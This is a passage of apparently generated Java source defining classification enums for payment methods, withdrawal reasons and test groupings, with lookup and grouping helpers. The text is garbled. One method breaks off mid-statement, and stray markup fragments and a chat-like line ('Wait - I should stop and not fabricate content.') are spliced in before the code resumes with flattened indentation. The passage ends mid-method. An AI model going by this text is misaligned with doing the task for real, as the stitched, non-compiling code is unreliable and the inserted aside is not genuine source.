            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<WithdrawalReason> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static WithdrawalReason codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof WithdrawalReason) { return (WithdrawalReason)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static WithdrawalReason nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; } // old-style API: unknown name yields null instead of an exception
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<WithdrawalReason> listAll() {
            return new ArrayList<WithdrawalReason>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<WithdrawalReason> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            throw new ClassificationNotFoundException("Unknown classification group: WithdrawalReason." + groupName); // no groups defined, so any name is unknown
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<WithdrawalReason> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<WithdrawalReason> clsList = new ArrayList<WithdrawalReason>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); } // throws ClassificationNotFoundException on any unknown code
            return clsList;
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<WithdrawalReason> groupOf(String groupName) {
            return new ArrayList<WithdrawalReason>(4); // no groups defined: always an empty (mutable) list
        }
        @Override public String toString() { return code(); }
    }
    /**
     * payment method
     */
    public enum PaymentMethod implements CDef {
        /** By hand: exchange for goods by face-to-face hand delivery */
        ByHand("HAN", "手渡し", emptyStrings())
        ,
        /** Bank transfer: goods are shipped after the bank transfer is confirmed */
        BankTransfer("BAK", "銀行振込", emptyStrings())
        ,
        /** Credit card: the credit card number is provided */
        CreditCard("CRC", "クレジットカード", emptyStrings())
        ;
        // lookup maps keyed by lower-cased code/name so that of()/byName() are case-insensitive
        private static final Map<String, PaymentMethod> _codeClsMap = new HashMap<String, PaymentMethod>();
        private static final Map<String, PaymentMethod> _nameClsMap = new HashMap<String, PaymentMethod>();
        static {
            for (PaymentMethod value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); } // sister codes resolve to the same element
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private PaymentMethod(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.PaymentMethod; }
        /**
         * Is the classification in the group? <br>
         * the most recommended method <br>
         * The group elements:[ByHand]
         * @return The determination, true or false.
         */
        public boolean isRecommended() {
            return ByHand.equals(this);
        }
        public boolean inGroup(String groupName) {
            if ("recommended".equals(groupName)) { return isRecommended(); } // group name matched case-sensitively here
            return false;
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<PaymentMethod> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof PaymentMethod) { return OptionalThing.of((PaymentMethod)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); } // unwrap a wrapped code before resolving
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<PaymentMethod> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static PaymentMethod codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof PaymentMethod) { return (PaymentMethod)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static PaymentMethod nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; } // old-style API: unknown name yields null instead of an exception
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<PaymentMethod> listAll() {
            return new ArrayList<PaymentMethod>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<PaymentMethod> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            if ("recommended".equalsIgnoreCase(groupName)) { return listOfRecommended(); }
            throw new ClassificationNotFoundException("Unknown classification group: PaymentMethod." + groupName);
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<PaymentMethod> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<PaymentMethod> clsList = new ArrayList<PaymentMethod>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); } // throws ClassificationNotFoundException on any unknown code
            return clsList;
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * the most recommended method <br>
         * The group elements:[ByHand]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<PaymentMethod> listOfRecommended() {
            return new ArrayList<PaymentMethod>(Arrays.asList(ByHand));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<PaymentMethod> groupOf(String groupName) {
            if ("recommended".equals(groupName)) { return listOfRecommended(); } // old-style: case-sensitive, unlike listByGroup()
            return new ArrayList<PaymentMethod>(4);
        }
        @Override public String toString() { return code(); }
    }
    /**
     * the test of reference variable in grouping map
     */
    public enum GroupingReference implements CDef {
        /** LAND_NAME */
        LAND_NAME("LND", "LAND_NAME", emptyStrings())
        ,
        /** SEA_NAME */
        SEA_NAME("SEA", "SEA_NAME", emptyStrings())
        ,
        /** IKSPIARY_NAME */
        IKSPIARY_NAME("IKS", "IKSPIARY_NAME", emptyStrings())
        ,
        /** AMPHI_NAME */
        AMPHI_NAME("AMP", "AMPHI_NAME", emptyStrings())
        ;
        // lookup maps keyed by lower-cased code/name so that of()/byName() are case-insensitive
        private static final Map<String, GroupingReference> _codeClsMap = new HashMap<String, GroupingReference>();
        private static final Map<String, GroupingReference> _nameClsMap = new HashMap<String, GroupingReference>();
        static {
            for (GroupingReference value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); } // sister codes resolve to the same element
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private GroupingReference(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.GroupingReference; }
        /**
         * Is the classification in the group? <br>
         * members who can use the service <br>
         * The group elements:[LAND_NAME, SEA_NAME]
         * @return The determination, true or false.
         */
        public boolean isServiceAvailable() {
            return LAND_NAME.equals(this) || SEA_NAME.equals(this);
        }
        /**
         * Is the classification in the group? <br>
         * The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
         * @return The determination, true or false.
         */
        public boolean isServicePlus() {
            return LAND_NAME.equals(this) || SEA_NAME.equals(this) || IKSPIARY_NAME.equals(this);
        }
        /**
         * Is the classification in the group? <br>
         * The group elements:[AMPHI_NAME, LAND_NAME, SEA_NAME, IKSPIARY_NAME]
         * @return The determination, true or false.
         */
        public boolean isNestedPlus() {
            return AMPHI_NAME.equals(this) || LAND_NAME.equals(this) || SEA_NAME.equals(this) || IKSPIARY_NAME.equals(this);
        }
        /**
         * Is the classification in the group? <br>
         * The group elements:[IKSPIARY_NAME]
         * @return The determination, true or false.
         */
        public boolean isOneDef() {
            return IKSPIARY_NAME.equals(this);
        }
        /**
         * Is the classification in the group? <br>
         * The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
         * @return The determination, true or false.
         */
        public boolean isDupRef() {
            return LAND_NAME.equals(this) || SEA_NAME.equals(this) || IKSPIARY_NAME.equals(this);
        }
        public boolean inGroup(String groupName) {
            // group name matched case-sensitively here; dispatches to the is*() group determinations
            if ("serviceAvailable".equals(groupName)) { return isServiceAvailable(); }
            if ("servicePlus".equals(groupName)) { return isServicePlus(); }
            if ("nestedPlus".equals(groupName)) { return isNestedPlus(); }
            if ("oneDef".equals(groupName)) { return isOneDef(); }
            if ("dupRef".equals(groupName)) { return isDupRef(); }
            return false;
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<GroupingReference> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof GroupingReference) { return OptionalThing.of((GroupingReference)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); } // unwrap a wrapped code before resolving
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<GroupingReference> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static GroupingReference codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof GroupingReference) { return (GroupingReference)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static GroupingReference nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; } // old-style API: unknown name yields null instead of an exception
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<GroupingReference> listAll() {
            return new ArrayList<GroupingReference>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<GroupingReference> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            if ("serviceAvailable".equalsIgnoreCase(groupName)) { return listOfServiceAvailable(); }
            if ("servicePlus".equalsIgnoreCase(groupName)) { return listOfServicePlus(); }
            if ("nestedPlus".equalsIgnoreCase(groupName)) { return listOfNestedPlus(); }
            if ("oneDef".equalsIgnoreCase(groupName)) { return listOfOneDef(); }
            if ("dupRef".equalsIgnoreCase(groupName)) { return listOfDupRef(); }
            throw new ClassificationNotFoundException("Unknown classification group: GroupingReference." + groupName);
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<GroupingReference> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<GroupingReference> clsList = new ArrayList<GroupingReference>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); } // throws ClassificationNotFoundException on any unknown code
            return clsList;
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * members who can use the service <br>
         * The group elements:[LAND_NAME, SEA_NAME]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<GroupingReference> listOfServiceAvailable() {
            return new ArrayList<GroupingReference>(Arrays.asList(LAND_NAME, SEA_NAME));
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<GroupingReference> listOfServicePlus() {
            return new ArrayList<GroupingReference>(Arrays.asList(LAND_NAME, SEA_NAME, IKSPIARY_NAME));
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * The group elements:[AMPHI_NAME, LAND_NAME, SEA_NAME, IKSPIARY_NAME]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<GroupingReference> listOfNestedPlus() {
            return new ArrayList<GroupingReference>(Arrays.asList(AMPHI_NAME, LAND_NAME, SEA_NAME, IKSPIARY_NAME));
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * The group elements:[IKSPIARY_NAME]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<GroupingReference> listOfOneDef() {
            return new ArrayList<GroupingReference>(Arrays.asList(IKSPIARY_NAME));
        }
        /**
         * Get the list of group classification elements. (returns new copied list) <br>
         * The group elements:[LAND_NAME, SEA_NAME, IKSPIARY_NAME]
         * @return The snapshot list of classification elements in the group. (NotNull)
         */
        public static List<GroupingReference> listOfDupRef() {
            return new ArrayList<GroupingReference>(Arrays.asList(LAND_NAME, SEA_NAME, IKSPIARY_NAME));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<GroupingReference> groupOf(String groupName) {
            // old-style: case-sensitive match, unlike listByGroup(); unknown group falls through to empty list
            if ("serviceAvailable".equals(groupName)) { return listOfServiceAvailable(); }
            if ("servicePlus".equals(groupName)) { return listOfServicePlus(); }
            if ("nestedPlus".equals(groupName)) { return listOfNestedPlus(); }
            if ("oneDef".equals(groupName)) { return listOfOneDef(); }
            if ("dupRef".equals(groupName)) { return listOfDupRef(); }
            return new ArrayList<GroupingReference>(4);
        }
        @Override public String toString() { return code(); }
    }
    /**
     * The test of relation reference
     */
    public enum SelfReference implements CDef {
        /** foo801 */
        Foo801("801", "foo801", emptyStrings())
        ,
        /** foo811 */
        Foo811("811", "foo811", emptyStrings())
        ,
        /** bar802: 0 */
        Bar802("802", "bar802", emptyStrings())
        ,
        /** baz803: 0 */
        Baz803("803", "baz803", emptyStrings())
        ,
        /** bar812: 0 */
        Bar812("812", "bar812", emptyStrings())
        ,
        /** baz813: 0 */
        Baz813("813", "baz813", emptyStrings())
        ;
        // lookup maps keyed by lower-cased code/name so that of()/byName() are case-insensitive
        private static final Map<String, SelfReference> _codeClsMap = new HashMap<String, SelfReference>();
        private static final Map<String, SelfReference> _nameClsMap = new HashMap<String, SelfReference>();
        static {
            for (SelfReference value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); } // sister codes resolve to the same element
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private SelfReference(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.SelfReference; }
        public boolean inGroup(String groupName) {
            return false; // no classification groups are defined for this classification
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<SelfReference> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof SelfReference) { return OptionalThing.of((SelfReference)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); } // unwrap a wrapped code before resolving
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<SelfReference> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static SelfReference codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof SelfReference) { return (SelfReference)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static SelfReference nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; } // old-style API: unknown name yields null instead of an exception
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<SelfReference> listAll() {
            return new ArrayList<SelfReference>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<SelfReference> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            throw new ClassificationNotFoundException("Unknown classification group: SelfReference." + groupName); // no groups defined, so any name is unknown
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<SelfReference> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<SelfReference> clsList = new ArrayList<SelfReference>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); } // throws ClassificationNotFoundException on any unknown code
            return clsList;
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<SelfReference> groupOf(String groupName) {
            return new ArrayList<SelfReference>(4); // no groups defined: always an empty (mutable) list
        }
        @Override public String toString() { return code(); }
    }
    /**
     * The test of top only
     */
    public enum TopCommentOnly implements CDef {
        ; // no elements are defined for this classification (top comment only)
        // case-insensitive lookup tables from code/name to element, populated once in the static initializer
        private static final Map<String, TopCommentOnly> _codeClsMap = new HashMap<String, TopCommentOnly>();
        private static final Map<String, TopCommentOnly> _nameClsMap = new HashMap<String, TopCommentOnly>();
        static {
            for (TopCommentOnly value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                // sister codes are alternate spellings that resolve to the same element
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        // per-element state: native code, display alias, and the (unmodifiable) set of sister codes
        private String _code; private String _alias; private Set<String> _sisterSet;
        private TopCommentOnly(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.TopCommentOnly; }
        public boolean inGroup(String groupName) {
            return false; // no classification groups are defined
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<TopCommentOnly> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof TopCommentOnly) { return OptionalThing.of((TopCommentOnly)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<TopCommentOnly> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static TopCommentOnly codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof TopCommentOnly) { return (TopCommentOnly)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static TopCommentOnly nameOf(String name) {
            if (name == null) { return null; }
            // valueOf() throws on unknown names; the old-style contract is to return null instead
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<TopCommentOnly> listAll() {
            return new ArrayList<TopCommentOnly>(Arrays.asList(values()))
</head>

<source_numbered>
L…› (none - see conversation)
</source_numbered>

Wait - I should stop and not fabricate content.
/**
* the test of sub-item map for implicit classification
*/
public enum SubItemImplicit implements CDef {
/** Aaa: means foo */
Foo("FOO", "Aaa", emptyStrings())
,
/** Bbb: means bar */
Bar("BAR", "Bbb", emptyStrings())
;
private static final Map<String, SubItemImplicit> _codeClsMap = new HashMap<String, SubItemImplicit>();
private static final Map<String, SubItemImplicit> _nameClsMap = new HashMap<String, SubItemImplicit>();
static {
for (SubItemImplicit value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private static final Map<String, Map<String, Object>> _subItemMapMap = new HashMap<String, Map<String, Object>>();
static {
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("regularStringItem", "value1<tag>");
subItemMap.put("regularNumberItem", "123");
subItemMap.put("regularVariousItem", "list:{\n ; reg\n ; var\n ; ite\n}");
subItemMap.put("listItem", "list:{\n ; aa\n ; bb\n ; cc\n}");
_subItemMapMap.put(Foo.code(), Collections.unmodifiableMap(subItemMap));
}
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("regularStringItem", "value2<teg>");
subItemMap.put("regularNumberItem", "456");
subItemMap.put("regularVariousItem", "map:{\n ; reg = var\n ; ous = ite\n}");
subItemMap.put("mapItem", "map:{\n ; key11 = value11\n}");
subItemMap.put("containsLine", "va\nlue");
_subItemMapMap.put(Bar.code(), Collections.unmodifiableMap(subItemMap));
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private SubItemImplicit(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return _subItemMapMap.get(code()); }
public ClassificationMeta meta() { return CDef.DefMeta.SubItemImplicit; }
public String regularStringItem() {
return (String)subItemMap().get("regularStringItem");
}
public String regularNumberItem() {
return (String)subItemMap().get("regularNumberItem");
}
public Object regularVariousItem() {
return subItemMap().get("regularVariousItem");
}
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemImplicit> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof SubItemImplicit) { return OptionalThing.of((SubItemImplicit)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
